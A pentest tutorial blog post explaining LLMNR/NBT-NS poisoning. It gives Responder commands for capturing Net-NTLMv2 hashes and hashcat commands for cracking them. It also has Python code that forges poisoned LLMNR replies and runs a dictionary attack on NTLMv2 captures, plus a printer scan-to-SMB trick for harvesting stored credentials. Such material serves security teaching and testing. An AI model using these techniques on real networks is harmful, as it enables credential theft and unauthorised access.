
LLMNR / NBT-NS Poisoning

tags: AD ActiveDirectory Responder hashcat LLMNR Poisoning

In this post we will go over LLMNR / NBT-NS poisoning: what the protocols are, how to capture NTLMv2 hashes with Responder, and how to crack them with hashcat.

What is LLMNR?

The first thing to clarify is that Link-Local Multicast Name Resolution (LLMNR) is not a substitute for DNS. Both provide name resolution, but LLMNR is far more limited in scope.

With DNS, the client asks its configured DNS server, which answers from its own records or forwards the query to another DNS server, potentially all the way to the server that is authoritative for the requested host's domain.

LLMNR, by contrast, is not routable. It can only resolve names among computers that share a subnet; hosts on the other side of a router are unreachable by it.

Microsoft made LLMNR non-routable because of the sheer number of hosts on the Internet. LLMNR has no name database to fall back on: a computer that needs a name simply sends the query to every host on the link, and the host that owns that name answers for itself. Its older sibling, the NetBIOS Name Service (NBT-NS), works the same way but uses broadcasts on UDP port 137, and Windows still falls back to it when LLMNR gets no answer. That design is the whole problem: any host on the segment can claim any name, and the requester has no way to verify the answer.

DNS remains the preferred name resolution method for Windows Vista and Windows Server 2008 (codenamed Longhorn Server at the time) and everything since. These systems try DNS first and only use LLMNR once they have determined that DNS cannot resolve the name.

How does LLMNR work?

Typically, the name resolution process begins when a computer needs to communicate with another host on the network. It has to resolve that host's name to an IP address, so it looks up the address of a DNS server in its TCP/IP configuration.

Several things could happen at this point. One possibility is that the DNS server resolves the name. Since the goal here is to illustrate how LLMNR works, assume instead that DNS resolution fails (the name does not exist, or the user mistyped it).

Once DNS has failed, the computer sends a multicast name query over UDP to the LLMNR group address (224.0.0.252, or ff02::1:3 for IPv6) on port 5355. Every device on the subnet receives it. Hosts running Windows Vista / Windows Server 2008 or later with LLMNR enabled compare the queried name with their own host name; if it matches and the host is not prohibited from answering LLMNR queries, it sends a unicast reply containing its IP address back to the requester. The query carries no authentication, so the requester accepts whichever reply arrives first.

LLMNR also supports reverse mapping queries: a host can send a query for a specific IP address and ask the host at that address to respond with its computer name.
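To make the exchange concrete, here is an added example (not code from the original post, and not Responder's code) that builds the LLMNR query a Windows host multicasts, parses it, and builds the poisoned unicast reply a tool like Responder would send back. Only the packet format is real (RFC 4795 borrows the DNS wire format); the share name, transaction ID and attacker IP are constructed values, and nothing is sent on the wire. NBT-NS uses a different (NetBIOS) packet layout and is not shown.

```python
import socket
import struct

# LLMNR constants from RFC 4795 (the protocol's real values).
LLMNR_GROUP_V4 = "224.0.0.252"
LLMNR_PORT = 5355
QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """Encode a host name as DNS-style length-prefixed labels."""
    out = b"".join(bytes([len(lbl)]) + lbl.encode("ascii") for lbl in name.strip(".").split("."))
    return out + b"\x00"


def decode_name(pkt: bytes, off: int):
    """Decode labels at pkt[off:]; supports a DNS compression pointer (0xC0xx)."""
    labels = []
    while True:
        ln = pkt[off]
        if ln & 0xC0 == 0xC0:                      # pointer to a name earlier in the packet
            ptr = struct.unpack(">H", pkt[off:off + 2])[0] & 0x3FFF
            name, _ = decode_name(pkt, ptr)
            labels.append(name)
            return ".".join(labels), off + 2
        off += 1
        if ln == 0:
            return ".".join(labels), off
        labels.append(pkt[off:off + ln].decode("ascii"))
        off += ln


def build_query(name: str, txid: int) -> bytes:
    """What a Windows host multicasts to 224.0.0.252:5355 after DNS fails."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)   # QR=0, QDCOUNT=1
    return header + encode_name(name) + struct.pack(">HH", QTYPE_A, QCLASS_IN)


def parse_query(pkt: bytes) -> dict:
    """Parse a single-question LLMNR query into its transaction ID and name."""
    txid, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", pkt[:12])
    if flags & 0x8000 or qd != 1:
        raise ValueError("not a single-question LLMNR query")
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack(">HH", pkt[off:off + 4])
    return {"id": txid, "name": name, "qtype": qtype, "qclass": qclass, "qend": off + 4}


def build_poisoned_response(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """The unicast reply a poisoner sends: same transaction ID, same question,
    one A record pointing at the attacker. Nothing in the protocol lets the
    victim check that the answering host really owns the name."""
    q = parse_query(query)
    header = struct.pack(">HHHHHH", q["id"], 0x8000, 1, 1, 0, 0)   # QR=1, ANCOUNT=1
    question = query[12:q["qend"]]
    answer = (b"\xc0\x0c"                                         # pointer to the question name
              + struct.pack(">HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
              + socket.inet_aton(attacker_ip))
    return header + question + answer


def parse_response(pkt: bytes) -> dict:
    """Recover what the victim acts on: the ID it matches and the IP it will connect to."""
    txid, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", pkt[:12])
    if not flags & 0x8000:
        raise ValueError("not a response")
    _, off = decode_name(pkt, 12)
    off += 4                                                     # skip QTYPE/QCLASS
    name, off = decode_name(pkt, off)
    rtype, rclass, rttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
    rdata = pkt[off + 10:off + 10 + rdlen]
    return {"id": txid, "name": name, "type": rtype, "ttl": rttl,
            "ip": socket.inet_ntoa(rdata) if rtype == QTYPE_A else rdata}


if __name__ == "__main__":
    # Constructed values: the share name from this post and a made-up attacker IP.
    query = build_query("hackme", txid=0x1234)
    reply = build_poisoned_response(query, "192.168.56.50")
    print(parse_query(query))
    print(parse_response(reply))
```

To really send the query you would `sendto(query, (LLMNR_GROUP_V4, LLMNR_PORT))` on a UDP socket; a poisoner binds UDP 5355, joins the multicast group and answers every query it sees with something like build_poisoned_response. The only thing the victim matches on is the transaction ID and the echoed question, which is why the first host to answer wins.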

How to perform LLMNR / NBT-NS poisoning

LLMNR/NBT-NS poisoning is commonly used by penetration testers during an engagement to capture NTLMv2 challenge-response hashes (Net-NTLMv2). The attacker's tool answers every LLMNR and NBT-NS query with the attacker's IP, so the victim connects to the attacker's fake SMB (or HTTP, and so on) server, which demands NTLM authentication and records the victim's response.

The captured hash is either cracked offline to recover the original password or relayed to another host while the session is live (NTLM relay). Note that a Net-NTLMv2 response cannot be used for pass-the-hash; that attack needs the NT hash itself.

The first step is to install Responder. On Kali a single command does it:

sudo apt install responder -y

On another distro, clone the repository and run it from there with sudo python3 /opt/Responder/Responder.py:

git clone https://github.com/lgandx/Responder.git /opt/Responder

Now find the name of the interface facing the target subnet with ifconfig or ip a.

In my case the command looks like this (-I selects the interface, -v prints verbose output):

sudo responder -I eth0 -v

Now, from a Windows machine on the same subnet and with Responder running, try to open a share that does not exist, for example \\hackme:


Windows asks for a username and password; as soon as the user fills in the form and submits it, Responder receives the NTLMv2 response for that password:


Save the captured hash into a file (on Kali, Responder also stores every capture under /usr/share/responder/logs/):

echo Administrador::ALPHA:b35d211aa2482bc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hashntlm

On a fresh Kali installation you first need to decompress the rockyou wordlist, which lives in /usr/share/wordlists:

cd /usr/share/wordlists
sudo gunzip rockyou.txt.gz

In my case I know the password because it is my own AD lab, so I made a short wordlist that contains it; I don't want to spend hours cracking a password I already know.

I recommend running hashcat on the host operating system rather than inside the VM: a Kali virtual machine usually has no access to the GPU, so hashcat may refuse to run or be very slow.

The command to crack it with hashcat is:

hashcat -m 5600 hashntlm dictionary --force

hashcat selects the hash type with the -m flag and a mode number; 5600 is NetNTLMv2, and the full list is on the hashcat example-hashes page. Next come the file with the hash and the file with the dictionary. --force makes hashcat ignore its warnings (for example about a missing or unsupported OpenCL runtime); only add it when hashcat refuses to start without it.
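To show what hashcat -m 5600 is actually doing, here is an added example, not code from this post nor from hashcat or Responder. It derives the NT hash (MD4 of the UTF-16LE password), the NTLMv2 hash (HMAC-MD5 keyed by the NT hash over the upper-cased user name plus domain) and the NTProofStr that appears as the fourth colon-separated field of the captured line, then runs a dictionary attack over a constructed wordlist. The user and domain names come from the post; the password, challenges, blob contents and wordlist are constructed. MD4 is implemented inline because hashlib on OpenSSL 3 systems often refuses it.

```python
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); used because hashlib.new('md4') is often unavailable."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = [
        (F, 0x00000000, (3, 7, 11, 19), range(16)),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    ]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        r = h[:]
        for f, add, shifts, order in rounds:
            for i, k in enumerate(order):
                p = (-i) % 4          # register updated this step: a, d, c, b, a, ...
                v = (r[p] + f(r[(p + 1) % 4], r[(p + 2) % 4], r[(p + 3) % 4]) + X[k] + add) & MASK
                s = shifts[i % 4]
                r[p] = ((v << s) | (v >> (32 - s))) & MASK
        h = [(a + b) & MASK for a, b in zip(h, r)]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """The NT hash stored in the SAM / NTDS: MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_response(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(HMAC-MD5(NThash, upper(user) + domain), server_challenge + blob)."""
    v2_hash = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(v2_hash, server_challenge + blob, hashlib.md5).digest()


def make_capture_line(password, user, domain, server_challenge=None, client_challenge=None):
    """Build the user::domain:challenge:NTProofStr:blob line Responder prints (hashcat -m 5600 layout).
    Challenges default to random constructed values; the blob is a minimal NTLMv2_CLIENT_CHALLENGE."""
    server_challenge = server_challenge or os.urandom(8)
    client_challenge = client_challenge or os.urandom(8)
    dom = domain.encode("utf-16-le")
    av_pairs = struct.pack("<HH", 2, len(dom)) + dom + struct.pack("<HH", 0, 0)   # MsvAvNbDomainName, MsvAvEOL
    blob = (b"\x01\x01\x00\x00" + b"\x00" * 4 + struct.pack("<Q", 0)            # type, reserved, timestamp (constructed)
            + client_challenge + b"\x00" * 4 + av_pairs + b"\x00" * 4)
    proof = ntlmv2_response(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def parse_5600(line: str):
    """Split a hashcat mode 5600 line into its fields (hex fields decoded to bytes)."""
    user, _, domain, chal, proof, blob = line.strip().split(":")
    return user, domain, bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)


def crack(line: str, wordlist):
    """Dictionary attack: the same computation hashcat -m 5600 runs, minus the GPU."""
    user, domain, chal, proof, blob = parse_5600(line)
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_response(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed demo: a capture for a known password and a tiny wordlist containing it.
    captured = make_capture_line("Password123", "Administrador", "ALPHA")
    print(captured)
    print("cracked:", crack(captured, ["123456", "Password123", "qwerty"]))
```

Because both HMAC-MD5 steps are cheap and unsalted beyond the challenges already present in the captured line, the cost of a guess is essentially one MD4 plus two MD5-HMACs, which is why a GPU can test billions of rockyou-style candidates per second against a single capture.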


Conclusions

Now you can use this on a pentest. It also combines well with devices such as printers that have a configuration interface, allow credentials to be stored and can deliver files to an SMB share (scan-to-SMB). Their web interfaces usually hide the stored username and password, but many include a "test" button for the SMB destination. If you find default credentials on such a device, change the destination IP to your own machine with Responder running and press the test button: the device authenticates to you and the credentials for that share arrive as an NTLMv2 hash. This is valuable because least privilege is often ignored, and those share accounts frequently hold elevated privileges.

Requirements for this to work:

  • A printer or other device with configuration capabilities.
  • The device stores credentials and can write to an SMB share.
  • The destination IP of the SMB test can be changed.